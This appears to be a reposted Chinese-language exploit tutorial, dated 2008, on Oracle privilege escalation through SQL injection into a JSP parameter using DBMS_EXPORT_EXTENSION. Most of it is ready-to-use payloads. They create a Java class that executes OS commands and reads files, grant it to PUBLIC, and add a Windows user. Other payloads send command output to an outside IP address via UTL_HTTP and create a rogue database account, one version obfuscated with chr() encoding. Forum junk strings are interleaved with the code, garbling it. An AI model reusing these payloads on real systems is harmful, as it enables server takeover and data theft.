以下的演示都是在 Web 上的 SQL*Plus 中执行的;在 Web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
+ n/ D! G" H% l6 z+ }1 {. g/ b* x7 D0 i9 _! m5 i
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 'a'|| 是为了让整个语句返回 true 值)
语句有点长,可能需要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 类 LinxUtil,里面有两个方法:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||( ( C; K# ^3 z3 w5 t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ m. W% L O* g& v5 x
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(' C% p J* b1 E, k$ h+ w7 t* ]
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}- `+ _. c" K [5 i5 w
}'''';END;'';END;--','SYS',0,'1',0) from dual
, I$ e+ S8 H* ~5 {% c)
& U6 o% D2 U% k: C------------------------
如果 URL 有长度限制,可以把 readFile() 方法块去掉,即:
$ z! X5 m; {* `) o' `/xxx.jsp?id=1 and '1'<>'a'||(
3 L: W% C" \$ p0 [# r4 ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 G' G# g* x3 x3 ?
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ b' c. i- ~2 _/ \new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 i9 p6 e' q# P}'''';END;'';END;--','SYS',0,'1',0) from dual
4 U0 z1 t# v( o, Z) q) # n: |3 X$ ]2 n" g$ E. w5 j. G
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
+ z+ F+ ]! E0 a+ r3 K9 M------------------------------
" ?" U5 J) x+ J5 }, B2.赋Java权限 ; p7 f" G& z8 K; t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ _& c- ]- o3 E- e+ I: n
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ u# Q9 C9 Z* L/ V8 \3 Y
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual0 {5 s0 I, F4 B- B; L) p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ O X, n) E2 @/ s4 c- b
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
1 O' h. X% U9 J, ~& tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
S# S# P1 s" Q3 t2 f: @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# V2 Y, L/ k9 k+ L$ j
5.测试上面的几步是否成功
9 `& a5 B* R5 p( X) F4 y( f) Qand '1'<>'11'||(
# r% ~& P& n( f7 A0 gselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 2 x! f5 ?& e% j F4 B& `- |$ I
) 2 e4 W, s# ?) n
and '1'<>(
" d4 H5 g/ E5 R4 P) |' \5 yselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
" h! b P/ h% {1 \4 o' a5 z" _)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( * x4 f; f+ l \, y3 D6 k
select sys.LinxRunCMD('cmd /c net user linx /add') from dual - u2 k" y* x: T; n" [2 n5 M( n0 p
3 y" O1 }- {- Q" o3 C) 7 X: z, C2 ?' E! ~
/xxx.jsp?id=1 and '1'<>( 7 ?, |+ r3 w1 L8 m- M2 R6 R
select sys.LinxReadFile('c:/boot.ini') from dual
$ M O& I% L C& R5 b
& [. S7 \* d3 Y |5 W0 U)
* ?5 U! V. p6 A: F) w
注意:sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果,可以用 union:
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual' {4 N+ B8 R! {5 Z
或者用 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( ; i$ `4 y% j2 ]9 a% o6 V
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
3 v% g/ E g `% K5 i$ G)
, n$ w! P" c: d' ?& U/xxx.jsp?id=1 and '1'<>( ' z& I5 a2 }0 ^% Y, Y
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
, `& S( ^$ _" p3 {)
注意:用 UTL_HTTP.request 时,要先用 REPLACE() 把空格、换行符替换掉,否则无法提交 HTTP 请求;也可以改用 utl_encode.base64_encode。
: ]- A, U' `" @--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
7 k9 a& `$ C+ f) }( d! s4 fselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
" L; D l6 Z, r7 v8 F7.删除我们创建的函数
b! \. ~5 s/ \/ N4 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& k& F! p2 ~6 K
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual & A. F; ^# o$ K8 p& c6 s. v
==================================================== 8 @: H9 y( R+ ~# A( Z' s
全文结束。谨以此文赠与我的朋友。
2 C! F& ?9 [1 ?; elinx
6 X! p1 p3 A" n124829445
0 P0 H4 H5 @ N% h( ^1 Y0 x: y2008.1.12
9 m' y) n4 |8 c$ k; }0 jlinyujian@bjfu.edu.cn
& Q" z7 a5 o6 J9 n' q====================================================================== $ N$ ~2 f& m* ]8 ^
测试漏洞的另一方法:
创建oracle帐号:
3 s1 J5 ^! k. e Y# nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* Q0 u$ a. P7 r! G& @4 M- X
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual9 @# y- e% G5 ~
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% _- M- I& S1 u, H; Y5 t' bchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual $ Q; E$ i2 E5 J# K
确定漏洞存在:
' s, S6 ?6 l* }1 d1<>( " A4 H% ?" x# C/ ], e3 H8 O3 c
select user_id from all_users where username='LINXSQL' . Q8 v" W0 {2 N* h8 {0 P# Q
) 1 f, E8 l/ _% J. ~) u2 |
给linxsql连接权限:
0 t9 s( L$ \- I- R$ Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 l4 q4 ~' } P" l8 V+ F7 hGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 1 A# X$ _0 j! W
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- W9 ~; U5 A5 |drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual % x+ P% s3 v/ g& w h$ G5 ?
======================
以下方法创建一个可以执行多条语句的函数 Linx_query(),执行成功的话返回数值 "1";但它的权限是继承调用者的(authid current_user),可能仅仅是 public 权限,作用似乎不大;真要用的话可以考虑 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>(
8 g) O; D$ C% [4 H- Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% W' A/ ~$ H& Z- C8 s* V
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual& b$ x+ X8 V. f+ Y2 k5 o4 ?4 i
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
+ u2 s4 e. i1 u% l& a4 s9 a )
% L% V- J# l, S" X) F* q% N# L9 D. U/ `' C
. X0 @) Q2 o2 J& x# J9 f) [8 [
) t' H0 j. U$ B( m |